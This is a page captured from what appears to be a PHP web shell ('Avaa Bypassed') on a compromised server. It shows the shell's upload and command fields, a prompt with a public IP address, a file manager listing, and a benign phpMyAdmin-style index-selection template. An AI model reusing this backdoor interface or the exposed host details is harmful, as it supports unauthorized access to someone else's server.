404

[ Avaa Bypassed ]




Upload:

Command:

botdev@13.59.219.20: ~ $
<select name="field_key[<?= $columnNumber;?>]"
        id="field_<?= $columnNumber; ?>_<?= ($ci - $ci_offset);?>"
        data-index="">
    <option value="none_<?= $columnNumber; ?>">---</option>
    <option value="primary_<?= $columnNumber; ?>"
            title="<?= __("Primary"); ?>"
            <?= ((isset($columnMeta['Key']) && $columnMeta['Key'] == 'PRI') ? 'selected="selected"' : '');?>>
        PRIMARY
    </option>
    <option value="unique_<?= $columnNumber; ?>"
            title="<?= __("Unique"); ?>"
        <?= ((isset($columnMeta['Key']) && $columnMeta['Key'] == 'UNI') ? 'selected="selected"' : '');?>>
        UNIQUE
    </option>
    <option value="index_<?= $columnNumber; ?>"
            title="<?= __("Index"); ?>"
        <?= ((isset($columnMeta['Key']) && $columnMeta['Key'] == 'MUL') ? 'selected="selected"' : '');?>>
        INDEX
    </option>
    <option value="fulltext_<?= $columnNumber; ?>"
            title="<?= __("Fulltext"); ?>"
        <?= ((isset($columnMeta['Key']) && $columnMeta['Key'] == 'FULLTEXT') ? 'selected="selected"' : '');?>>
        FULLTEXT
    </option>
    <option value="spatial_<?= $columnNumber; ?>"
            title="<?= __("Spatial"); ?>"
        <?= ((isset($columnMeta['Key']) && $columnMeta['Key'] == 'SPATIAL') ? 'selected="selected"' : '');?>>
        SPATIAL
    </option>
</select>

Filemanager

Name Type Size Permission Actions
column_adjust_privileges.phtml File 716 B 0644
column_attribute.phtml File 1.01 KB 0644
column_attributes.phtml File 8.34 KB 0644
column_auto_increment.phtml File 350 B 0644
column_comment.phtml File 485 B 0644
column_default.phtml File 1.82 KB 0644
column_definitions_form.phtml File 6.59 KB 0644
column_extra.phtml File 316 B 0644
column_indexes.phtml File 1.32 KB 0644
column_length.phtml File 458 B 0644
column_name.phtml File 1.46 KB 0644
column_null.phtml File 356 B 0644
column_type.phtml File 390 B 0644
column_virtuality.phtml File 1.43 KB 0644
mime_type.phtml File 897 B 0644
move_column.phtml File 774 B 0644
partitions.phtml File 8.25 KB 0644
table_fields_definitions.phtml File 4.91 KB 0644
transformation.phtml File 1.4 KB 0644
transformation_option.phtml File 471 B 0644